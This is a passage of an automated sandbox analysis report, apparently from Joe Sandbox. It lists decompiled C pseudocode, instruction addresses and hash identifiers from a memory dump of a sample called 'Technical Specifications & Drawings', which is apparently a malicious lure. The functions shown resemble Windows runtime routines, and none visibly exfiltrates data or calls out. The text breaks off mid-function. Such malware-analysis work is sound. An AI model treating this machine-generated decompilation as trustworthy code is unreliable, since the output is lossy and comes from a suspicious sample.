							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                  0x017a52a5
                                                  0x017a52ad
                                                  0x017a52b0
                                                  0x017a52b3
                                                  0x017a52b7
                                                  0x017a52ba
                                                  0x017a52bf
                                                  0x017a52c4
                                                  0x017a52cc
                                                  0x00000000
                                                  0x00000000
                                                  0x017a52ce
                                                  0x017a52d9
                                                  0x017a52dd
                                                  0x017a52e7
                                                  0x017a52f7
                                                  0x017a52f9
                                                  0x017a52fd
                                                  0x01800dcf
                                                  0x01800dd5
                                                  0x01800dd6
                                                  0x01800dd7
                                                  0x01800dd8
                                                  0x01800dd9
                                                  0x01800dde
                                                  0x01800ddf
                                                  0x01800de0
                                                  0x01800de1
                                                  0x01800de2
                                                  0x01800de5
                                                  0x01800dea
                                                  0x01800dec
                                                  0x01800f60
                                                  0x01800f64
                                                  0x01800f70
                                                  0x01800f76
                                                  0x01800f79
                                                  0x01800f79
                                                  0x00000000
                                                  0x01800f64
                                                  0x01800df2
                                                  0x01800df7
                                                  0x01800e04
                                                  0x01800e0d
                                                  0x01800e0d
                                                  0x01800e10
                                                  0x01800e1a
                                                  0x01800e1c
                                                  0x01800e4c
                                                  0x01800e52
                                                  0x01800e61
                                                  0x01800e67
                                                  0x01800e6b
                                                  0x01800e70
                                                  0x01800e76
                                                  0x01800ed7
                                                  0x01800edc
                                                  0x01800ee0
                                                  0x01800ee6
                                                  0x01800eea
                                                  0x01800eed
                                                  0x01800ef0
                                                  0x01800ef3
                                                  0x01800ef6
                                                  0x01800ef9
                                                  0x01800efe
                                                  0x01800f01
                                                  0x01800f01
                                                  0x01800f0b
                                                  0x01800f12
                                                  0x01800f16
                                                  0x01800f18
                                                  0x01800f1b
                                                  0x01800f2c
                                                  0x01800f31
                                                  0x01800f31
                                                  0x01800f35
                                                  0x01800f39
                                                  0x01800f3a
                                                  0x01800f3c
                                                  0x01800f3f
                                                  0x01800f50
                                                  0x01800f55
                                                  0x01800f55
                                                  0x01800f59
                                                  0x017a52eb
                                                  0x017a52f1
                                                  0x017a52f1
                                                  0x01800e7d
                                                  0x01800e84
                                                  0x01800e88
                                                  0x01800e8a
                                                  0x01800e8d
                                                  0x01800e9e
                                                  0x01800ea3
                                                  0x01800ea3
                                                  0x01800ea7
                                                  0x01800eaf
                                                  0x01800eb3
                                                  0x01800eb9
                                                  0x01800eb9
                                                  0x01800ebc
                                                  0x01800ecd
                                                  0x01800ecd
                                                  0x00000000
                                                  0x01800eb3
                                                  0x01800e21
                                                  0x01800e2b
                                                  0x01800e2f
                                                  0x01800e30
                                                  0x01800e3a
                                                  0x01800e3f
                                                  0x01800e41
                                                  0x00000000
                                                  0x00000000
                                                  0x01800e47
                                                  0x00000000
                                                  0x01800e47
                                                  0x01800df9
                                                  0x01800dfe
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01800dfe
                                                  0x017a5303
                                                  0x017a5307
                                                  0x00000000
                                                  0x017a5309
                                                  0x00000000
                                                  0x017a5309
                                                  0x017a5307
                                                  0x017a52e9
                                                  0x017a52e9
                                                  0x00000000
                                                  0x017a52e9
                                                  0x017a530e
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1045956fa2dc1edb93cbcfe7815b3703f4cb51d3722992b3b125cf16de1a640b
                                                  • Instruction ID: 4f9da6dc2423e5e9c5a7ac1a692305fb74b29b3731084b5d3201eaa41171d65f
                                                  • Opcode Fuzzy Hash: 1045956fa2dc1edb93cbcfe7815b3703f4cb51d3722992b3b125cf16de1a640b
                                                  • Instruction Fuzzy Hash: D551EEB12093469BD722DF68C888B67FBE4FF94710F14091EF59587691EB74E900CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D2AE4 Relevance: .2, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017D2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1898204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1898208; // 0x1898207
				_t8 = _t57 + 0x1898208; // 0x1898207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1898450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x189821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1896d5c; // 0x7f500654
							_t72 =  *0x1896d5c; // 0x7f500654
							_t75 =  *0x1896d5c; // 0x7f500654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1896d5c; // 0x7f500654
							_t84 =  *0x1896d5c; // 0x7f500654
							_t87 =  *0x1896d5c; // 0x7f500654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E017EF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                  0x017d2ae4
                                                  0x017d2aec
                                                  0x017d2aef
                                                  0x017d2af4
                                                  0x017d2af7
                                                  0x017d2afd
                                                  0x017d2b92
                                                  0x017d2b92
                                                  0x017d2b97
                                                  0x017d2b9c
                                                  0x017d2b9c
                                                  0x017d2b03
                                                  0x017d2b06
                                                  0x017d2b09
                                                  0x017d2b09
                                                  0x017d2b0f
                                                  0x017d2b15
                                                  0x017d2b15
                                                  0x017d2b1b
                                                  0x017d2b1e
                                                  0x017d2b21
                                                  0x017d2b26
                                                  0x017d2b29
                                                  0x017d2b81
                                                  0x017d2b84
                                                  0x017d2c0e
                                                  0x017d2c15
                                                  0x017d2c24
                                                  0x017d2c24
                                                  0x017d2b8a
                                                  0x017d2b8a
                                                  0x017d2b8a
                                                  0x017d2b8a
                                                  0x017d2b90
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2b4a
                                                  0x017d2b4a
                                                  0x017d2b4d
                                                  0x017d2b53
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2b55
                                                  0x017d2b58
                                                  0x017d2bb7
                                                  0x01815d1b
                                                  0x01815d37
                                                  0x01815d47
                                                  0x01815d53
                                                  0x017d2bbd
                                                  0x017d2bbd
                                                  0x017d2bbd
                                                  0x017d2bb7
                                                  0x017d2b5d
                                                  0x017d2c2f
                                                  0x01815d5b
                                                  0x01815d77
                                                  0x01815d87
                                                  0x01815d93
                                                  0x017d2c35
                                                  0x017d2c35
                                                  0x017d2c35
                                                  0x017d2c2f
                                                  0x017d2b65
                                                  0x017d2b9f
                                                  0x017d2ba2
                                                  0x017d2b67
                                                  0x017d2b67
                                                  0x017d2b69
                                                  0x017d2b6b
                                                  0x017d2b6e
                                                  0x017d2bc9
                                                  0x017d2bcc
                                                  0x017d2bcf
                                                  0x017d2bd4
                                                  0x017d2bd6
                                                  0x017d2bd6
                                                  0x017d2bdb
                                                  0x017d2c02
                                                  0x017d2c05
                                                  0x017d2c07
                                                  0x00000000
                                                  0x017d2c07
                                                  0x017d2be0
                                                  0x017d2c00
                                                  0x017d2c3f
                                                  0x017d2c3f
                                                  0x00000000
                                                  0x017d2c00
                                                  0x017d2be5
                                                  0x017d2be7
                                                  0x017d2bec
                                                  0x017d2bf4
                                                  0x017d2bf6
                                                  0x00000000
                                                  0x017d2bf6
                                                  0x017d2b70
                                                  0x017d2b76
                                                  0x017d2b2b
                                                  0x017d2b2b
                                                  0x017d2b2d
                                                  0x017d2b2f
                                                  0x017d2b32
                                                  0x017d2b35
                                                  0x017d2b3a
                                                  0x00000000
                                                  0x017d2b40
                                                  0x017d2b43
                                                  0x017d2b45
                                                  0x017d2b47
                                                  0x017d2b4a
                                                  0x017d2b4d
                                                  0x017d2b53
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2b53
                                                  0x017d2b78
                                                  0x017d2b78
                                                  0x017d2b7b
                                                  0x017d2b7e
                                                  0x00000000
                                                  0x017d2b7e
                                                  0x017d2b76
                                                  0x017d2ba5
                                                  0x017d2ba5
                                                  0x017d2ba8
                                                  0x017d2bad
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2baf
                                                  0x017d2baf
                                                  0x017d2bc2
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 29b76b308e244fa6f328f6a84cdfc503620b944e24420dfad9c563ce70ec3f4f
                                                  • Instruction ID: 072e0bf58341be7685735ffe0cfb032548df484b3457555bf4c8b5399088beb8
                                                  • Opcode Fuzzy Hash: 29b76b308e244fa6f328f6a84cdfc503620b944e24420dfad9c563ce70ec3f4f
                                                  • Instruction Fuzzy Hash: E151A376B001198FCB18CF5CC4909BDF7B1FB89700719849AE856EB366E771AE52CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0186AE44 Relevance: .2, Instructions: 152COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E0186AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0186C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0186ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0186FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0186EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E017C7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01861608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01871536(0x1898ae4, (_t74 -  *0x1898b04 >> 0x14) + (_t74 -  *0x1898b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0186C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0186A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0184CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0186ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                  0x0186ae44
                                                  0x0186ae4c
                                                  0x0186ae53
                                                  0x0186ae55
                                                  0x0186ae5c
                                                  0x0186ae64
                                                  0x0186ae68
                                                  0x0186ae75
                                                  0x0186ae75
                                                  0x0186ae78
                                                  0x0186ae7a
                                                  0x0186ae7c
                                                  0x0186ae7f
                                                  0x0186aea8
                                                  0x0186aeab
                                                  0x0186aead
                                                  0x00000000
                                                  0x00000000
                                                  0x0186aeb3
                                                  0x0186aeb8
                                                  0x0186aebb
                                                  0x0186aebd
                                                  0x00000000
                                                  0x0186ae81
                                                  0x0186ae88
                                                  0x0186ae8f
                                                  0x0186ae9b
                                                  0x0186ae96
                                                  0x0186ae96
                                                  0x0186ae96
                                                  0x0186aea0
                                                  0x0186aea3
                                                  0x0186aebf
                                                  0x0186aebf
                                                  0x0186aec3
                                                  0x0186aec9
                                                  0x0186af0d
                                                  0x0186af14
                                                  0x0186af3d
                                                  0x0186af3d
                                                  0x0186af41
                                                  0x0186af44
                                                  0x0186af67
                                                  0x0186af67
                                                  0x0186af6a
                                                  0x0186afca
                                                  0x0186afd1
                                                  0x00000000
                                                  0x0186afd1
                                                  0x0186af6c
                                                  0x0186af6d
                                                  0x0186af75
                                                  0x0186af7c
                                                  0x0186af7e
                                                  0x0186af80
                                                  0x0186af85
                                                  0x0186af87
                                                  0x0186af99
                                                  0x0186af89
                                                  0x0186af92
                                                  0x0186af92
                                                  0x0186af9e
                                                  0x0186afa1
                                                  0x0186afa3
                                                  0x0186afa9
                                                  0x0186afb0
                                                  0x0186afb2
                                                  0x0186afb4
                                                  0x0186afbc
                                                  0x0186afbc
                                                  0x0186afb4
                                                  0x0186afb0
                                                  0x00000000
                                                  0x0186afa1
                                                  0x0186af4f
                                                  0x0186af57
                                                  0x0186af5c
                                                  0x0186af5e
                                                  0x00000000
                                                  0x00000000
                                                  0x0186af60
                                                  0x0186af64
                                                  0x0186af64
                                                  0x00000000
                                                  0x0186af64
                                                  0x0186af1a
                                                  0x0186af25
                                                  0x00000000
                                                  0x00000000
                                                  0x0186af27
                                                  0x0186af28
                                                  0x0186af33
                                                  0x00000000
                                                  0x0186aed0
                                                  0x0186aed0
                                                  0x0186aed2
                                                  0x0186aee1
                                                  0x0186aee4
                                                  0x00000000
                                                  0x00000000
                                                  0x0186aee6
                                                  0x0186aeec
                                                  0x00000000
                                                  0x00000000
                                                  0x0186aefb
                                                  0x0186af07
                                                  0x0186afd3
                                                  0x0186afdb
                                                  0x0186afdb
                                                  0x00000000
                                                  0x0186af07
                                                  0x0186aed6
                                                  0x0186aed8
                                                  0x0186aedf
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0186aedf
                                                  0x0186aec9

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 862161faf589cbf82ba8d1e152db6e3852f401dc48c82c96179d8828bd4d36c8
                                                  • Instruction ID: afe3928f75832a4089f9805c87dfdb5ae59d7c125ac05de82901adb4dccb08d8
                                                  • Opcode Fuzzy Hash: 862161faf589cbf82ba8d1e152db6e3852f401dc48c82c96179d8828bd4d36c8
                                                  • Instruction Fuzzy Hash: FB41C4B17006159BD72EDA2DC894B3BB7DEAF94720F044219FA16E72D1DB34DA01C792
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017CDBE9 Relevance: .1, Instructions: 149COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E017CDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E017ACC50(E017A4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E017C7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01878ED6(_t102, _t98);
						}
						_t76 = _v44;
						E017C2280(_t58, _v44);
						E017CDD82(_v44, _t102, _t98);
						E017CB944(_t102, _v5);
						return E017BFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1898628; // 0x0
							_v28 = _t67;
							_t68 =  *0x189862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1898628; // 0x0
						_t105 = _v28;
						_t80 =  *0x189862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x186fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                  0x017cdbe9
                                                  0x017cdbf2
                                                  0x017cdbf7
                                                  0x017cdbf9
                                                  0x017cdbfc
                                                  0x017cdc00
                                                  0x017cdc03
                                                  0x017cdc14
                                                  0x017cdd54
                                                  0x017cdd54
                                                  0x017cdd54
                                                  0x017cdc18
                                                  0x017cdc1d
                                                  0x017cdc1d
                                                  0x017cdc32
                                                  0x017cdc3b
                                                  0x017cdc3e
                                                  0x017cdc46
                                                  0x017cdd5b
                                                  0x017cdd62
                                                  0x017cdd64
                                                  0x017cdd67
                                                  0x017cdd69
                                                  0x017cdd6b
                                                  0x017cdd6e
                                                  0x017cdd70
                                                  0x017cdd73
                                                  0x017cdd73
                                                  0x00000000
                                                  0x017cdc4c
                                                  0x017cdc4e
                                                  0x01813ae3
                                                  0x01813ae8
                                                  0x01813aea
                                                  0x017cdce7
                                                  0x017cdce9
                                                  0x017cdcec
                                                  0x017cdcee
                                                  0x017cdcf0
                                                  0x017cdcf3
                                                  0x017cdcf5
                                                  0x01813af2
                                                  0x01813af5
                                                  0x01813af5
                                                  0x017cdd06
                                                  0x017cdd08
                                                  0x017cdd0b
                                                  0x017cdd12
                                                  0x01813b08
                                                  0x017cdd18
                                                  0x017cdd18
                                                  0x017cdd18
                                                  0x017cdd20
                                                  0x017cdd23
                                                  0x01813b16
                                                  0x01813b16
                                                  0x017cdd29
                                                  0x017cdd2d
                                                  0x017cdd36
                                                  0x017cdd40
                                                  0x017cdd51
                                                  0x017cdd51
                                                  0x017cdc54
                                                  0x017cdc59
                                                  0x017cdc59
                                                  0x017cdc5e
                                                  0x017cdc5e
                                                  0x017cdc63
                                                  0x017cdc66
                                                  0x017cdc6b
                                                  0x017cdc78
                                                  0x017cdc7b
                                                  0x017cdc81
                                                  0x017cdc81
                                                  0x017cdc83
                                                  0x017cdc89
                                                  0x00000000
                                                  0x00000000
                                                  0x017cdd7b
                                                  0x017cdd7b
                                                  0x017cdc8f
                                                  0x017cdc8f
                                                  0x017cdc92
                                                  0x017cdc99
                                                  0x017cdc9f
                                                  0x017cdca5
                                                  0x017cdcaa
                                                  0x017cdcaa
                                                  0x017cdcb3
                                                  0x017cdcb8
                                                  0x017cdcbb
                                                  0x017cdcc1
                                                  0x017cdccf
                                                  0x017cdcd2
                                                  0x017cdcd5
                                                  0x017cdcd7
                                                  0x017cdcda
                                                  0x017cdcdc
                                                  0x017cdcdc
                                                  0x017cdce2
                                                  0x017cdce4
                                                  0x00000000
                                                  0x017cdce4

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1eb122cd8418cd981f758bda08521f7ad467b56153494f4f3c8a3788499d5a41
                                                  • Instruction ID: d1eedbc540fb84a4d0b8a0846dd92f08ccc45545698a23dc3e3bff014421481c
                                                  • Opcode Fuzzy Hash: 1eb122cd8418cd981f758bda08521f7ad467b56153494f4f3c8a3788499d5a41
                                                  • Instruction Fuzzy Hash: A9516D71E00606DFCB25CFA8C4806AEFBF5BB49710F24816ED955A7345EB70A984CBD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017BEF40 Relevance: .1, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E017BEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
